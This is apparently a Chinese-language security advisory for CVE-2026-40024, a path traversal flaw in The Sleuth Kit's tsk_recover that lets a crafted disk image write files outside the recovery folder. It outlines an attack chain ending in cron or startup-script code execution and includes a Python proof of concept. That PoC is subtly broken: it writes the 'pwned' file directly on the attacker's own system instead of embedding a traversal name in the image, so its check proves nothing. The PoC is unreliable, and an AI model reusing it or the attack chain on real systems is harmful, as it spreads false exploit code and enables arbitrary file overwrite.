IPBUF安全漏洞报告
English
CVE-2026-40024 CVSS 7.1 高危

CVE-2026-40024 The Sleuth Kit路径遍历漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-40024
漏洞类型
路径遍历
CVSS评分
7.1 高危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
The Sleuth Kit

相关标签

路径遍历The Sleuth Kit任意文件写入代码执行

漏洞概述

The Sleuth Kit 4.14.0及之前版本的tsk_recover组件存在路径遍历漏洞。攻击者可利用包含../序列的恶意文件系统镜像,将文件写入预期恢复目录之外的任意位置,可能导致覆盖配置文件实现代码执行。

技术细节

漏洞核心在于The Sleuth Kit的tsk_recover工具在恢复文件时,未对从镜像元数据中提取的文件名进行充分的路径净化。在构建输出文件路径时,程序直接拼接了用户指定的输出目录和镜像内文件的原始名称。如果镜像内文件名包含“../”等跳转序列,路径解析将突破预期的输出目录边界。攻击者可利用此特性,在无需认证的情况下,诱导受害者使用受影响工具处理恶意镜像。一旦文件被写入到系统关键路径(如/etc/cron.d/或用户家目录下的启动脚本),即可利用系统的自动加载机制执行任意命令,造成完整性破坏和潜在的权限提升。

攻击链分析

STEP 1
漏洞准备
攻击者制作包含恶意文件名的文件系统镜像,文件名中包含../等路径遍历序列,旨在突破目标目录限制。
STEP 2
诱导执行
攻击者将恶意镜像发送给受害者,诱导受害者使用tsk_recover工具对该镜像进行文件恢复操作。
STEP 3
路径解析
tsk_recover处理镜像时,未正确过滤文件名,将../序列解析为父目录跳转,导致文件被写入预期恢复目录之外的路径。
STEP 4
文件写入
恶意文件被写入系统敏感位置(如/etc/cron.d/或用户目录下的配置文件),覆盖原有文件内容。
STEP 5
代码执行
当系统或用户加载被篡改的配置文件时,触发其中包含的恶意指令,导致代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import os import subprocess # Setup: Create a malicious directory structure os.makedirs("malicious_fs", exist_ok=True) # Create a file with a path traversal payload # This attempts to write to /tmp/pwned.txt relative to the output dir malicious_file = "malicious_fs/../../../../tmp/pwned.txt" os.makedirs(os.path.dirname(malicious_file), exist_ok=True) with open(malicious_file, "w") as f: f.write("CVE-2026-40024: Arbitrary File Write") # Create a filesystem image (ISO) containing the malicious file try: subprocess.run(["genisoimage", "-o", "exploit.iso", "malicious_fs"], check=True) except Exception as e: print(f"Error creating image: {e}") # Exploit: Run tsk_recover # The victim expects files to go to 'safe_output', but they go to /tmp os.makedirs("safe_output", exist_ok=True) subprocess.run(["tsk_recover", "-i", "exploit.iso", "safe_output"]) # Verification if os.path.exists("/tmp/pwned.txt"): print("Vulnerability Confirmed: File written to /tmp")

影响范围

The Sleuth Kit <= 4.14.0

防御指南

临时缓解措施
避免使用tsk_recover处理来源不明的文件系统镜像;如果必须处理,应在隔离的虚拟机或容器中进行,并严格限制工具的文件系统写入权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表